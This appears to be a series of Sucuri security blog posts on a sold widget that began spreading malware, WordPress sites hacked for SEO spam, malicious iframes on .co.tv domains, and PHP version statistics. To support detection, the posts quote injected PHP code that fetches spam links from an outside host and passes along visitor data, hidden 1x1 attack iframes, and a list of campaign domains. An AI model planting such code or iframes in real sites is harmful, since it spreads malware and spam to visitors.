The Danger of Remote Widgets – Feedcat.net Sold and Now Distributing Malware

Do you like to add all types of “widgets” and cool badges to your site? Be careful which ones do you choose, or your site may get compromised. Be specially careful if the widget vendor sells the technology and doesn’t inform its users. Why, you may ask?

Recently, a popular widget site (feedcat) was sold on flippa. Out of nowhere sites that had their code embedded started getting redirected to random sites, get annoying pop up ads, and distributing malware.

This little piece of code was doing it:

<script src="http://www.feedcat.net/js2/button.js?pub=xx&amp;bmode=b83x16&amp;ilng=en&amp;section=”..

So, if you’re one of the 300k sites using feedcat, remove it now. If you are seeing weird pop ups or ads on your site, check to make sure you don’t have it installed.

If your site is currently redirecting to an Amazon site and getting stuck there you probably have the feedcat code on your site:

http://continue_.s3.amazonaws.com/index.html?AWSAccessKeyId=AKIAIKDZBVZT6ABSN6MA&Expires=1311373754&Signature=60QGS34LES2ymcgNXV2WT1Iq2Zg%3D

You can use our free scanner to see if your site has it: sitecheck.sucuri.net

Let us know if you have any questions.

*update:

Other people are complaining about it too.

Top linked sites – What webmasters are linking to

We scan hundreds of thousands of sites daily here at Sucuri and while analyzing some of the data we got interested on what sites are getting the “link love” more often.

By link love, I mean what “do follow” links most webmasters have in their sites? After extracting the data from the last 500k scans we did, those were the top:

  1. 6.9% – www.facebook.com
  2. 6.4% – twitter.com
  3. 2.8% – wordpress.org
  4. 2.6% – youtube.com
  5. 1.9% – feeds.feedburner.com
  6. 1.2% – www.linkedin.com
  7. 1.2% – www.google.com
  8. 1.1% – validator.w3.org
  9. 1.1% – wwww.adobe.com
  10. 0.9% – www.addthis.com

So it means that 6.9% of the sites had a link to facebook, 6.4% to twitter, etc. I was actually surprised to see validator.w3.org ranked so well. We would be in a much better place if even 1% of the sites validated properly.

It also shows the force of WordPress, with almost 3% of the sites linking there (and probably using WordPress).

Those were the top 30:

  1. www.facebook.com.
  2. twitter.com.
  3. wordpress.org.
  4. www.youtube.com.
  5. feeds.feedburner.com.
  6. www.linkedin.com.
  7. www.google.com.
  8. validator.w3.org.
  9. www.adobe.com.
  10. www.addthis.com.
  11. www.flickr.com.
  12. www.myspace.com.
  13. feedburner.google.com.
  14. www.blogger.com.
  15. www.macromedia.com.
  16. statcounter.com.
  17. www.amazon.com.
  18. www.addtoany.com.
  19. www.wordpress.org.
  20. creativecommons.org.
  21. bit.ly.
  22. en.wikipedia.org.
  23. facebook.com.
  24. www.statcounter.com.
  25. www.liveinternet.ru.
  26. www.histats.com.
  27. feeds2.feedburner.com.
  28. www.apple.com
  29. www.gnu.org
  30. www.stumbleupon.com

It is also interesting that people are linking to shorten URLS (bit.ly) so often too. What do you think? What sites do you have linked in your own sites?

Python: No such file or directory – Your site is likely compromised

If you run a WordPress site and you are seeing the following error at the top of your pages:

sh:  /usr/local/bin/python: No such file or directory

It means that it is likely compromised. How do we know that? We were tracking a large blackhat SEO spam campaign (targeting WordPress sites) and we noticed that for the last few days one of their link distrubution domains were broken and generating an error. So any hacked site would display that error instead of showing the spammy links.

This is the code that caused it (added to the index.php of the hacked sites):

<?php
        $url = "http://apollos&#46com&#46tw/LHRS/12/request&#46php?ip="&#46$_SERVER[‘REMOTE_ADDR’]&#46"&useragent="&#46urlencode($_SERVER[‘HTTP_USER_AGENT’])&#46"&referer="&#46urlencode($_SERVER["HTTP_REFERER"]);
        $answer = file_get_contents($url);
        if (strpos($answer,"noredirect") === false) {
                echo $answer;
        }
?>

As you can see, it attempts to connect to apollos.com.tw to get the list of links to display. However, if you access this domain now you will get a python error instead…

Those are some other domains being used in this spam campaign:

apollos.com.tw
coolbloglinks.com
iqitiq.com
readerspot.com
tsarstvonebesnoe.ru
wat.az

If you are unsure if your site is compromised, try doing a quick scan here: http://sitecheck.sucuri.net

Google blocks .co.cc, attackers are now using .co.tv

It is being reported that Google took action against the high number of malware sites in the .co.cc domain, removing more than 11 million sites from their search results.

For us this is good news, since we haven’t been seeing anything good coming from there (only malware and spam). They did a similar thing a few weeks ago blacklisting the whole .cz.cc domain.

However, just as they blacklisted the .co.cc, we are starting to see the attackers switching tactics and using different free domains. The popular one now is .co.tv:

<iframe src="http://uhcmsgfq&#46co&#46tv/?go=1" width="1" height="1"></iframe>

<iframe src="http://yswlifofj&#46co&#46tv/?go=1" width="1" height="1"></iframe> 

<iframe width="1" height="1" src="http://vmvfonc&#46co&#46tv/?go=1"></iframe>

<iframe src="http://cvfplmpsap&#46co&#46tv/?go=1" width="1" height="1"></iframe>

<iframe src="http://kwhnqxvslf&#46co&#46tv/?go=1" width="1" height="1"></iframe>

Those are just some of the malicious iframes we are seeing on hacked sites now (a few weeks ago they would have been on the .co.cc domain). As you can see by their names (vmvfonc.co.tv, kwhnqxvslf.co.tv, yswlifofj.co.tv, etc) they are random and being mass generated.

We are also seeing a lot of malware and spam in the .co.be domain range (like dumoxoveba21.co.be), but it seems Google banned the whole .co.be range as well.

What Google is doing is good, but the “war” is not over :)


If you are worried your site might be hacked or compromised, scan it here: http://sitecheck.sucuri.net.

WordPress 3.2 and PHP support – Security effect

WordPress 3.2 is going to be released very soon and one of the biggest changes is that they will drop support for PHP4 and all versions of PHP5 bellow 5.2.4.

WordPress.org has provided some informative posts about their reasons for dropping support for these PHP versions.

But how will that affect their user base? And how many users are still using these old versions of PHP? We did some scanning and reached around 90 thousand self-hosted WordPress sites that had their PHP version displayed (via the Powered By header).

These are the numbers we found in our analysis (version with less than 0.2% were not displayed):

0.9% – PHP/4.3
5.1% – PHP/4.4
6.0% – PHP/5.1
0.7% – PHP/5.2.0
0.4% – PHP/5.2.1
0.4% – PHP/5.2.3
8.3% – PHP/5.3
76.4% – PHP/5.2.4+

What does this mean? It means that for 84% of the users, based on our numbers, nothing will happen. They will be able to continue using WordPress happily without major changes.

However, almost 15% of the users may experience problems when upgrading to WordPress 3.2 because of their current environment. They will have to contact their hosting, or try to figure out how to update PHP manually.

One of the great benefits in WordPress is the automatic update functionality. However, our analysis estimates that the move to require PHP 5 could leave roughly 15% of WordPress users with no easy update path. When you think of the big market share that WordPress owns, this makes for a very large amount of websites that will potentially remain out of date and vulnerable to attacks.

Will we see a higher number of outdated WordPress instances due to the move? It does seem the number will increase, at least until hosting providers step up their game (which I hope they will do soon).

If you’re running WordPress and aren’t sure what version of PHP your running, contact your hosting provider. Ask them, and if they’re running anything below 5.2.4, we recommend asking them to upgrade as soon as possible (or consider switching hosts). You can also scan your site here to see which version of PHP you are using: http://sitecheck.sucuri.net.

So what do think? Good move by WordPress? Bad environment management by hosting providers? Can and will this lead to more hacked sites?

We’d love to hear from you, make sure to leave us a comment.